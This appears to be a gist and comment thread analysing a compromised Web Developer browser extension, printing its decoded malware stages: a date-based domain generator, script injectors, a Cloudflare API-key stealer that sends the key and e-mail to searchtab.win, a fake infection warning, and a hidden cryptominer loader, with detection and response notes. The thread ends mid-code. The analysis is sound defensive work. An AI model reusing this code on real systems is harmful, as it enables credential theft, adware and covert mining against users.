@piedpiperRichard
Last active August 26, 2023 13:03
Web Developer 0.4.9 (browser extension) compromised to install adware — decoded payload
/* MD5 compression function (RFC 1321): folds one 512-bit message block
 * `k` (16 little-endian 32-bit words, see md5blk) into the running state
 * `x` (4 words), mutating `x` in place. Four rounds of 16 steps use the
 * round functions ff/gg/hh/ii; the per-step rotation amounts
 * (7,12,17,22 / 5,9,14,20 / 4,11,16,23 / 6,10,15,21) and the additive
 * constants are the RFC's tables, written here as signed 32-bit ints
 * (e.g. -680876936 == 0xd76aa478). This is ordinary library code; the
 * malicious part of the sample is the caller at the bottom of the script,
 * which uses md5() to derive a daily domain name. */
function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];
/* round 1 (F) */
a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17, 606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12, 1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7, 1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7, 1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22, 1236535329);
/* round 2 (G) */
a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14, 643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9, 38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5, 568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20, 1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14, 1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);
/* round 3 (H) */
a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16, 1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11, 1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4, 681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23, 76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16, 530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);
/* round 4 (I) */
a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10, 1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6, 1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6, 1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21, 1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15, 718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);
/* add the block's result to the chaining state (mod 2^32) */
x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);
}
/* One MD5 step: a = b + rotl32(a + q + x + t, s), where `q` is the output
 * of the round's bit-select function, `x` the message word and `t` the
 * round constant. `>>>` keeps the rotate's right half unsigned. */
function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}
/* Round 1 function F(b,c,d) = (b & c) | (~b & d) */
function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
/* Round 2 function G(b,c,d) = (b & d) | (c & ~d) */
function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
/* Round 3 function H(b,c,d) = b ^ c ^ d */
function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}
/* Round 4 function I(b,c,d) = c ^ (b | ~d) */
function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}
/* Computes the raw MD5 state (4 x int32) of string `s`, treating each
 * UTF-16 code unit as one byte. Neither this loop nor md5blk masks the
 * code unit to 8 bits, so the digest matches real MD5 only for inputs
 * whose code units are all <= 0xFF (the author's own note below admits
 * this). That is fine for the sample's use (an ASCII date string), but
 * worth knowing if you regenerate its domains in another language. */
function md51(s) {
txt = ''; /* unused; assigning an undeclared name creates a global in sloppy mode */
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i; /* RFC 1321 IV */
/* full 64-char blocks */
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
/* remaining tail (< 64 chars), padded with 0x80 then zeros */
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
/* no room left for the length field: flush and start a second tail block */
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
/* message length in bits; only the low word is written (tail[15] stays 0) */
tail[14] = n*8;
md5cycle(state, tail);
return state;
}
/* there needs to be support for Unicode here,
* unless we pretend that we can redefine the MD-5
* algorithm for multi-byte characters (perhaps
* by adding every four 16-bit characters and
* shortening the sum to 32 bits). Otherwise
* I suggest performing MD-5 as if every character
* was two bytes--e.g., 0040 0025 = @%--but then
* how will an ordinary MD-5 sum be matched?
* There is no way to standardize text to something
* like UTF-8 before transformation; speed cost is
* utterly prohibitive. The JavaScript standard
* itself needs to look at this: it should start
* providing access to strings as preformed UTF-8
* 8-bit unsigned value arrays.
*/
/* Packs 64 UTF-16 code units of `s` into 16 little-endian 32-bit words.
 * No masking is applied, so only code units <= 0xFF yield a
 * standards-conforming MD5 block (see the author's note above). */
function md5blk(s) {
var words = [];
for (var w = 0; w < 16; w++) {
var o = w * 4;
words[w] = s.charCodeAt(o)
+ (s.charCodeAt(o + 1) << 8)
+ (s.charCodeAt(o + 2) << 16)
+ (s.charCodeAt(o + 3) << 24);
}
return words;
}
/* Hex digit table used by rhex(). */
var hex_chr = '0123456789abcdef'.split('');
/* Renders one 32-bit state word as 8 lowercase hex characters, least
 * significant byte first (MD5 emits its digest little-endian). */
function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}
/* Converts the 4-word state to the usual 32-char digest. Note it
 * overwrites the array elements in place before joining. */
function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}
/* md5(s): lowercase hex digest of `s` (byte-handling caveat in md51). */
function md5(s) {
return hex(md51(s));
}
/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause. */
/* 32-bit wrapping add. `| 0` is ToInt32, the same truncation the
 * original `& 0xFFFFFFFF` performs (0xFFFFFFFF is -1 as an int32). */
function add32(a, b) {
return (a + b) | 0;
}
/* Self-test against the known MD5 of "hello". If the fast add32 above
 * gives a wrong result (the author blames old IE), add32 is redefined
 * with a 16-bit-halves version. The function declaration inside the
 * block only replaces the outer add32 under sloppy-mode (Annex B)
 * semantics; in a strict-mode script or an ES module it would be
 * block-scoped and the fallback would never take effect. */
if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}
/* --- Domain generation: the part a defender needs to reproduce ---
 * One domain per UTC calendar day:
 *   "wd" + md5("<day>-<month>-<year>") + ".win"
 * The fields are plain numbers with no zero padding (2 Aug 2017 ->
 * "2-8-2017"), so a regenerated list must use exactly that format.
 * Because the only seed is the date, every future domain can be
 * precomputed and blocked or sinkholed ahead of time. */
var date = new Date();
var day = date.getUTCDate();
var month = date.getUTCMonth() + 1;
var year = date.getUTCFullYear();
var hour = date.getUTCHours();
console.log(hour); /* `hour` is never used for the domain; looks like a debugging leftover (whose, cannot be told from here) */
var d = day + '-' + month + '-' + year;
var hash = "wd" + md5(d) + ".win";
/* The <script> tag is assembled from fragments so a naive signature scan
 * of the extension bundle for "<script src=" matches nothing. As written
 * the closing tag comes out as "</sc ript>" (stray space) — original
 * bug or transcription artefact, cannot be told from here; config_fragment
 * is not used anywhere in this listing. */
var config_fragment = '<sc' + 'ri' + 'pt sr' + 'c="ht'+ 'tp' + 's://' + hash + '/ga.js"></sc ' + 'ri' + 'pt>';
alert(hash); /* displays the day's domain — presumably the analyst's addition rather than adware behaviour */
        /*
        Decode.
adware link
http://wd7bdb20e4d622f6569f3e8503138c859d.win
      */

piedpiperRichard commented Aug 2, 2017

Decoded. The DGA domain current when this was captured (presumably the one generated for 2 Aug 2017) was wd7bdb20e4d622f6569f3e8503138c859d.win, and the first-stage script it served is wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js — obfuscated form first, de-obfuscated form after it:

// First stage (wd<md5>.win/ga.js), obfuscated. Every property name and
// string is fetched from the hex-escaped table _0x4d27 so that
// "cloudflare.com", "searchtab.win" etc. never appear as plain text; the
// de-obfuscated equivalent is listed immediately below. Behaviour:
//  - top frame on cloudflare.com        -> inject //searchtab.win/ga.js (the
//                                          Cloudflare API-key stealer decoded further down)
//  - otherwise, unless on redirect2.top -> inject //partner-net.men/code/?pid=973820&r=<random>
//                                          (the pid is '9738' + '20&r' from the table)
//  - then a stock Google Analytics snippet with tracking id UA-103045553-1,
//    a useful pivot for finding related samples.
// Reading top.location.href throws in a cross-origin iframe and there is
// no try/catch around it, so in that case nothing below runs.
var _0x4d27 = ["\x63\x6C\x6F\x75\x64\x66\x6C\x61\x72\x65\x2E\x63\x6F\x6D", "\x69\x6E\x64\x65\x78\x4F\x66", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x2F\x2F\x73\x65\x61\x72\x63\x68\x74\x61\x62\x2E\x77\x69\x6E\x2F\x67\x61\x2E\x6A\x73", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65", "\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65", "\x72\x65\x64\x69\x72\x65\x63\x74\x32\x2E\x74\x6F\x70", "\x2F\x2F\x70\x61", "\x72\x74\x6E\x65", "\x72\x2D\x6E\x65", "\x74\x2E\x6D\x65", "\x6E\x2F\x63\x6F", "\x64\x65\x2F\x3F", "\x70\x69\x64\x3D", "\x39\x37\x33\x38", "\x32\x30\x26\x72", "\x3D", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2D\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x63\x6F\x6D\x2F\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x6A\x73", "\x67\x61", "\x47\x6F\x6F\x67\x6C\x65\x41\x6E\x61\x6C\x79\x74\x69\x63\x73\x4F\x62\x6A\x65\x63\x74", "\x70\x75\x73\x68", "\x71", "\x6C", "\x61\x73\x79\x6E\x63", "\x63\x72\x65\x61\x74\x65", "\x55\x41\x2D\x31\x30\x33\x30\x34\x35\x35\x35\x33\x2D\x31", "\x61\x75\x74\x6F", "\x73\x65\x6E\x64", "\x70\x61\x67\x65\x76\x69\x65\x77"];
// [3]=location [2]=href [1]=indexOf [0]="cloudflare.com"
if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {
    (function() {
        var _0xb2b9x1 = document[_0x4d27[5]](_0x4d27[4]);
        _0xb2b9x1[_0x4d27[6]] = _0x4d27[7];
        _0xb2b9x1[_0x4d27[8]] = _0x4d27[9]; // src = "//searchtab.win/ga.js"
        var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
        _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    // [13]="redirect2.top"
    if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[13]) == -1) {
        (function() {
            var _0xb2b9x3 = document[_0x4d27[5]](_0x4d27[4]);
            _0xb2b9x3[_0x4d27[6]] = _0x4d27[7];
            // src = "//partner-net.men/code/?pid=973820&r=" + floor(1e7 * random())
            _0xb2b9x3[_0x4d27[8]] = _0x4d27[14] + _0x4d27[15] + _0x4d27[16] + _0x4d27[17] + _0x4d27[18] + _0x4d27[19] + _0x4d27[20] + _0x4d27[21] + _0x4d27[22] + _0x4d27[23] + Math[_0x4d27[25]](10000000 * Math[_0x4d27[24]]());
            var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
            _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x3, _0xb2b9x2);
            // moves the page's ORIGINAL first <script> (not the injected one) to the top of <body>
            try {
                var _0xb2b9x4 = document[_0x4d27[27]][_0x4d27[26]];
                _0xb2b9x4[_0x4d27[12]][_0x4d27[11]](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document[_0x4d27[27]][_0x4d27[28]](_0xb2b9x2)
            }
        })()
    }
};
// stock Google Analytics bootstrap: window.ga queue + async analytics.js
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5[_0x4d27[31]] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8][_0x4d27[33]] = _0xb2b9x5[_0xb2b9x8][_0x4d27[33]] || [])[_0x4d27[32]](arguments)
    }, _0xb2b9x5[_0xb2b9x8][_0x4d27[34]] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2[_0x4d27[5]](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2[_0x4d27[10]](_0xb2b9x6)[0];
    _0xb2b9x9[_0x4d27[35]] = 1;
    _0xb2b9x9[_0x4d27[8]] = _0xb2b9x7;
    _0xb2b9xa[_0x4d27[12]][_0x4d27[11]](_0xb2b9x9, _0xb2b9xa)
})(window, document, _0x4d27[4], _0x4d27[29], _0x4d27[30]);
ga(_0x4d27[36], _0x4d27[37], _0x4d27[38]); // ga('create', 'UA-103045553-1', 'auto')
ga(_0x4d27[39], _0x4d27[40]) // ga('send', 'pageview')

// Unconditionally injects loading.website/alert_ce.php — the scareware
// "Your computer is infected" prompt decoded further down — before the
// page's first <script>. Runs on every page the extension touches.
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
// De-obfuscated form of the string-table version above (same logic).
// Branch 1: only when the top frame is on cloudflare.com, inject the
// credential stealer from searchtab.win. Note top.location.href throws
// in a cross-origin iframe and nothing catches it.
if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
    (function() {
        var _0xb2b9x1 = document['createElement']('script');
        _0xb2b9x1['type'] = 'text/javascript';
        _0xb2b9x1['src'] = '//searchtab.win/ga.js';
        var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
        _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    // Branch 2: everywhere except redirect2.top, inject the partner-net.men
    // ad/loader script with a cache-busting random `r` (0..9999999).
    if (top['location']['href']['indexOf']('redirect2.top') == -1) {
        (function() {
            var _0xb2b9x3 = document['createElement']('script');
            _0xb2b9x3['type'] = 'text/javascript';
            _0xb2b9x3['src'] = '//pa' + 'rtne' + 'r-ne' + 't.me' + 'n/co' + 'de/?' + 'pid=' + '9738' + '20&r' + '=' + Math['floor'](10000000 * Math['random']());
            var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
            _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x3, _0xb2b9x2);
            // Moves the page's original first <script> (not the injected
            // one) to the top of <body>; bug or intent, cannot tell.
            try {
                var _0xb2b9x4 = document['body']['firstChild'];
                _0xb2b9x4['parentNode']['insertBefore'](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document['body']['appendChild'](_0xb2b9x2)
            }
        })()
    }
};
// Stock Google Analytics bootstrap. The tracking id UA-103045553-1 is
// attacker-controlled and a handy pivot for correlating other samples.
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5['GoogleAnalyticsObject'] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8]['q'] = _0xb2b9x5[_0xb2b9x8]['q'] || [])['push'](arguments)
    }, _0xb2b9x5[_0xb2b9x8]['l'] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2['createElement'](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2['getElementsByTagName'](_0xb2b9x6)[0];
    _0xb2b9x9['async'] = 1;
    _0xb2b9x9['src'] = _0xb2b9x7;
    _0xb2b9xa['parentNode']['insertBefore'](_0xb2b9x9, _0xb2b9xa)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

// Always: inject the scareware prompt script from loading.website.
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
Second-stage URLs referenced by ga.js:
searchtab.win/ga.js — only when the top frame is on cloudflare.com
partner-net.men/code/?pid=973820&r=<random integer 0..9999999> — everywhere else, unless the page is on redirect2.top
https://loading.website/alert_ce.php — always
Note: the string table decodes to pid=973820 ('9738' + '20&r'). The "7973820" id that appears in the partner-net.men loader below matches the pid the analyst fetched by hand, so it is probably the server echoing the requested id rather than what ga.js asks for.


piedpiperRichard commented Aug 2, 2017

Decoded: searchtab.win/ga.js (the stage that runs only when the user is on cloudflare.com):

  // searchtab.win/ga.js — reached only when the top frame is on
  // cloudflare.com (see the first stage). It reads two values the
  // Cloudflare dashboard keeps on window.bootstrap: the logged-in user's
  // e-mail and `atok`, apparently the dashboard's anti-CSRF token, which
  // it replays in the "x-atok" request header. Riding on the victim's
  // session cookies, the GET to /api/v4/user/api_key returns the
  // account's Global API key, which is then exfiltrated together with
  // the e-mail via an image beacon to searchtab.win/ga.php.
  //
  // IR notes: anyone who ran the trojanised extension and opened the
  // Cloudflare dashboard while it was active should treat the Global API
  // key as compromised — rotate it and review the account audit log for
  // DNS/zone changes. Detection: outbound GETs to searchtab.win/ga.php
  // carrying `user=` and `key=` query parameters.
  // The console.log calls and "// 4th" markers look like the author's own
  // debugging output left in the sample.
  console.log('window - onload'); // 4th
  console.log(window.bootstrap); // 4th
  console.log(window.bootstrap.data.user.email);
  console.log(window.bootstrap.atok);
  //   console.log(window.bootstrap); // 4th

  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', 'https://www.cloudflare.com/api/v4/user/api_key', true);
  xmlhttp.setRequestHeader("x-atok", window.bootstrap.atok); // CSRF token replay
  xmlhttp.onreadystatechange = function() {
      if (xmlhttp.readyState == 4) {
          if (xmlhttp.status == 200) {
              var obj = JSON.parse(xmlhttp.responseText);
              var key = obj.result.api_key; // the Global API key
              console.log(key);
              // exfiltration: image beacon, so no CORS preflight and no visible network activity in the page
              (new Image).src = '//searchtab.win/ga.php?user=' + encodeURIComponent(window.bootstrap.data.user.email) + '&key=' + encodeURIComponent(key);
          }
      }
  };
  xmlhttp.send(null);

Decoded: partner-net.men/code/?pid=7973820&r=10000000 (the ad loader; this URL appears to have been fetched by hand — ga.js itself requests pid=973820 with a random r):

// partner-net.men/code/?pid=... — second-stage script loader.
// The outer `t` is a "has run" flag. n() checks that document.body is
// usable and that we are in the top frame; until both hold, e() re-polls
// every 10 ms. r() then runs exactly once and queues three more scripts
// from partner-net.men/code/pid/. All exceptions are swallowed.
(function() {
    var t = false;

    function r() {
        // This inner `t` shadows the outer flag, so `if (t === 1)` below
        // is always true and the window[<hostname>] once-per-page guard
        // always applies.
        var t = 1;
        var r = parseInt("7973820"); // publisher id; matches the pid in the fetched URL, presumably echoed by the server
        var e = [{
            src: "//partner-net.men/code/pid/linkcheck.js?rev=133",
            async: false
        }, {
            src: "//partner-net.men/code/pid/7973820_BNX.js?rev=133",
            async: true
        }, {
            src: "//partner-net.men/code/pid/7973820_ALL.js?rev=133",
            async: false
        }];
        var n = false;
        // Per-publisher kill switches: `i` disables everything, `a` drops
        // the _BNX script on mail.ru/ok.ru/vk.com, 485743 drops linkcheck.
        // None of them match 7973820, so all three scripts load here.
        var i = [359045];
        var a = [581350, 655971, 812933, 535264, 330970, 888078, 612812, 552308, 516442, 144200, 378507, 820585, 714257, 211746];
        if (window.location.host.match(/(mail\.ru|ok\.ru|vk\.com)/) && a.indexOf(r) > -1) {
            e[1].src = null
        }
        if (r === 485743) {
            e[0].src = null
        }
        if (i.indexOf(r) > -1) {
            e = []
        }
        if (t === 1) {
            var c = window[window.location.hostname] || false;
            if (c) return;
            window[window.location.hostname] = true
        }
        // Inject each script at the top of <body>, falling back to appendChild.
        for (var o = 0; o < e.length; o++) {
            if (e[o].src) {
                var s = document.createElement("script");
                s.setAttribute("charset", "UTF-8");
                if (e[o].async) s.setAttribute("async", "async");
                s.setAttribute("src", e[o].src);
                try {
                    var d = document.body.firstChild;
                    d.parentNode.insertBefore(s, d)
                } catch (t) {
                    n = true
                }
                if (n) {
                    try {
                        document.body.appendChild(s)
                    } catch (t) {}
                }
            }
        }
    }
    // retry scheduler: keeps polling every 10 ms until r() has run
    var e = function() {
        if (!t) {
            setTimeout(function() {
                n()
            }, 10)
        }
    };
    // does not run inside iframes (window === top)
    var n = function() {
        try {
            if ("function" == typeof document.body.appendChild && window === top) {
                t = true;
                r()
            }
        } catch (t) {}
        e()
    };
    n()
})();
// After a 1 s delay, appends f.partnerwork.men/code/code/index_4.php to
// <body> unless a script with that src prefix is already present. This
// is the hand-off to the cryptominer chain decoded below. Errors are
// silently swallowed.
(function() {
    try {
        setTimeout(function() {
            var e = 'https://f.partnerwork.men/code/code/index_4.php';
            if (!document.querySelector('script[src^="' + e + '"]')) {
                var t = document.createElement('script');
                t.type = 'text/javascript';
                t.src = e;
                document.getElementsByTagName('body')[0].appendChild(t)
            }
        }, 1e3)
    } catch (e) {}
})();

Decoded: https://loading.website/alert_ce.php (the scareware prompt that ga.js injects on every page):


        // loading.website/alert_ce.php — scareware. A fake infection warning
        // via confirm(); clicking OK navigates the TOP frame (escaping any
        // iframe) to a traffic-distribution endpoint on loading.website,
        // which per the analyst's list below ended in a "PCKeeper
        // Installer.exe" download. Declining does nothing.
        var msg = 'Your computer is infected. You have to check it with antivirus.';

        if (confirm(msg)) {
            var tds_url = 'http://loading.website/tds.php?subid=ce2';
            top.location.href = tds_url;
        } else {
        }
Third-stage URLs queued by the partner-net.men loader (rev=133):
partner-net.men/code/pid/linkcheck.js?rev=133 (synchronous)
partner-net.men/code/pid/7973820_BNX.js?rev=133 (async)
partner-net.men/code/pid/7973820_ALL.js?rev=133 (synchronous)
https://f.partnerwork.men/code/code/index_4.php (appended after 1 s; leads to the miner chain below)
http://loading.website/tds.php?subid=ce2 — the scareware redirect target, a traffic-distribution endpoint by its name, which at the time led to a download of "PCKeeper Installer.exe"


piedpiperRichard commented Aug 2, 2017

Decoded: https://f.partnerwork.men/code/code/index_4.php (loaded by the partner-net.men loader above):

// f.partnerwork.men/code/code/index_4.php — miner loader gated on tab
// visibility. `t` is whichever Page Visibility property the browser
// supports (hidden / webkitHidden / mozHidden / msHidden). While the tab
// is hidden the check is simply repeated every 10 s; once visible it
// injects a.partnerwork.men/code/code/index_3.php unless a mss_3.js from
// y. or a.partnerwork.men is already on the page. The initial 10 s delay
// plus the visibility gate keep the payload from starting in a
// background tab or during a quick automated page load (inferred
// purpose). All errors are swallowed.
! function() {
    try {
        var e = function() {
            var t;
            void 0 !== document.hidden ? t = "hidden" : void 0 !== document.webkitHidden ? t = "webkitHidden" : void 0 !== document.mozHidden ? t = "mozHidden" : void 0 !== document.msHidden && (t = "msHidden"), document[t] ? setTimeout(function() {
                e()
            }, 10000) : function() {
                try {
                    var e = !1;
                    // "y" pass: only checks; "a" pass: checks, then injects if neither host's mss_3.js was found
                    ["y", "a"].forEach(function(t) {
                        if (!1 === e && document.querySelector('script[src^="https://' + t + '.partnerwork.men/code/code/mss_3.js"]')) e = !0;
                        else if ("a" === t && !1 === e) {
                            var d = document.createElement("script");
                            d.type = "text/javascript", d.src = "https://a.partnerwork.men/code/code/index_3.php", document.getElementsByTagName("body")[0].appendChild(d)
                        }
                    })
                } catch (e) {}
            }()
        };
        setTimeout(function() {
            e()
        }, 10000)
    } catch (e) {}
}();


piedpiperRichard commented Aug 2, 2017

Decoded: https://y.partnerwork.men/code/code/index_3.php (the miner kick-off; index_4.php above requests it from the a. host, this copy was fetched from y.):

// y.partnerwork.men/code/code/index_3.php — in-browser cryptominer kick-off.
// `hash` is a JSON-RPC job (blob / job_id / target) of the shape a mining
// pool hands to a CryptoNight-style (Monero) miner — inferred from the
// field names, not proven by this snippet. It loads mss_3.js (which must
// define m_miner; not in this listing), starts hashing 200 nonces from
// nonce 200 after a 2 s delay, then removes its own <script> element so
// the DOM no longer shows where the code came from.
var hash = '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"161860651313327","job":{"blob":"0505b1e088cc052109c263b6823040e1560aa1971840aca59a318eb770a957a9afb0e038f084cf0000000077cc8ace862fa5505349f456dbc03a1b45b235ddf8757747b734713b165db5850a","job_id":"121997309522703","target":"8b4f0100"},"status":"OK"}}';
var start_nonce = 200;
var count_pl = 200;
var src = "https://y.partnerwork.men/code/code/mss_3.js";
if (document.querySelector('script[src^="' + src + '"]')) m_miner(hash, start_nonce, count_pl);
else {
    var d = document.createElement("script");
    d.type = "text/javascript", d.src = src, document.body.appendChild(d), setTimeout(function() {
        m_miner(hash, start_nonce, count_pl)
    }, 2e3)
}
// anti-forensics: delete this loader's own <script> tag
var scripts = document.querySelectorAll('script[src^="https://y.partnerwork.men/code/code/index_3.php"]');
scripts && scripts.length > 0 && scripts[0].parentNode.removeChild(scripts[0]);

@amlwwalker

@piedpiperRichard what is:

if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {

`top` in this case? That's not native JS… is there a mapping somewhere I haven't spotted?

@g00glen00b

@amlwwalker that refers to window.top. So basically window.top.location.href.

That script is the one that bothers me the most, since it appears to fetch the e-mail address and Global API key of whoever is logged in to Cloudflare. Those can be used to send spam or phishing, or to repoint the victim's Cloudflare-hosted domains to even more malicious sites.


h0n24 commented Aug 3, 2017

Here's a human-readable version of the wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js file (the string-table obfuscation above resolved to plain names):

// On the Cloudflare dashboard only: load the API-key stealer.
if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
  (function() {
    var createScript = document['createElement']('script');
    createScript['type'] = 'text/javascript';
    createScript['src'] = '//searchtab.win/ga.js';
    var getScript = document['getElementsByTagName']('script')[0];
    getScript['parentNode']['insertBefore'](createScript, getScript)
  })()
} else {
  // Everywhere else (except redirect2.top): load the partner-net.men ad loader.
  if (top['location']['href']['indexOf']('redirect2.top') == -1) {
    (function() {
      var createScript = document['createElement']('script');
      createScript['type'] = 'text/javascript';
      createScript['src'] = '//partner-net.men/code/?pid=973820&r=' + Math['floor'](10000000 * Math['random']());
      var getScript = document['getElementsByTagName']('script')[0];
